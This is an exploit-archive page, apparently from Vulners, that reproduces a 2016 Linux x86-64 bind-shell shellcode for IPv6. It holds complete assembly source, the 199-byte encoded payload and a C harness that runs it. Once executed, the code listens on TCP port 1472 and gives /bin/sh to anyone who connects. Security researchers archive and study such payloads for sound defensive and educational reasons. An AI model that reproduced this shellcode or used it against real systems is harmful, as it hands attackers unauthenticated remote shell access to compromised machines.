Vulners
Lucene search
Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)
/*
# Title : Linux x86_64 bind tcp : port 1472 ipv6
# Date : 02/05/2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
# Contact : [email protected]
*/
/*
section .text
global _start
_start:
;;socket()
xor rax,rax
push 6
push 0x1
push 10
pop rdi
pop rsi
pop rdx
mov al,41 ;socket()
syscall
;------------------------------------
xor r15,r15
mov r15,rax ;storing socket descriptor
;--------------------
;fork()
xor rax,rax
mov al,57
xor rdi,rdi
syscall
;-------------------
xor rdi,rdi
cmp rax,rdi
je ps
;-------------
;exit()
xor rax,rax
mov al,60
syscall
;--------------
ps:
;----------------
;bind()
xor rax,rax
push byte 28
pop rdx ;sizeof struct sock_addrin6
push rax ;sin6_scope_id
push rax ;sin6_addr
push rax ;sin6_addr
push rax ;sin6_flowinfo
push word 0xc005 ;sin6_port (htons(1472)) (U may change it)
push word 10 ;sin6_family
push rsp
pop rsi
mov rdi,r15 ;scoket des
mov al,49
syscall
;---------------------------------------
;listen()
mov rdi,r15
xor rsi,rsi
add rsi,2
xor rax,rax
mov al,50
syscall
;------------------------------------
;accept()
xor r9,r9
xor rdx,rdx
xor rsi,rsi
xor rax,rax
mov rdi,r15
mov dl,28
mov al,43
syscall
;------------------
mov r9,rax ;storing client descriptor
;-------------------
;close() closing socket descriptor
xor rax,rax
mov rdi,r15
mov al,3
syscall
;------------------
;;dup2(cd,0)
xor rsi,rsi
mul rsi
mov rdi,r9
mov al,33
syscall
;------------
;------------------
;;dup2(cd,1)
xor rax,rax
inc rsi
mov rdi,r9
mov al,33
syscall
;------------
;------------------
;;dup2(cd,2)
xor rax,rax
inc rsi
mov rdi,r9
mov al,33
syscall
jmp exe
;------------
exe:
;exeve(//bin/sh)
xor rdx,rdx
xor rsi,rsi
xor rdi,rdi
mul rdi
mov r10, 0x68732f6e69622f2f
shr r10,8;shift right 8 bit
push r10
push rsp
pop rdi
mov al,59
syscall
*/
#include<stdio.h>
#include<string.h>
char shellcode[] ="\x48\x31\xc0\x6a\x06\x6a\x01\x6a\x0a\x5f\x5e\x5a\xb0\x29\x0f\x05\x4d\x31\xff\x49\x89\xc7\x48\x31\xc0\xb0\x39\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\x48\x31\xc0\x6a\x1c\x5a\x50\x50\x50\x50\x66\x68\x05\xc0\x66\x6a\x0a\x54\x5e\x4c\x89\xff\xb0\x31\x0f\x05\x4c\x89\xff\x48\x31\xf6\x48\x83\xc6\x02\x48\x31\xc0\xb0\x32\x0f\x05\x4d\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xc0\x4c\x89\xff\xb2\x1c\xb0\x2b\x0f\x05\x49\x89\xc1\x48\x31\xc0\x4c\x89\xff\xb0\x03\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\xeb\x00\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\xf7\xe7\x49\xba\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xea\x08\x41\x52\x54\x5f\xb0\x3b\x0f\x05";
main()
{
printf("shellcode length %ld\n",(unsigned long)strlen(shellcode));
(* (int(*)()) shellcode) ();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 May 2016 00:00Current
7.4High risk
Vulners AI Score7.4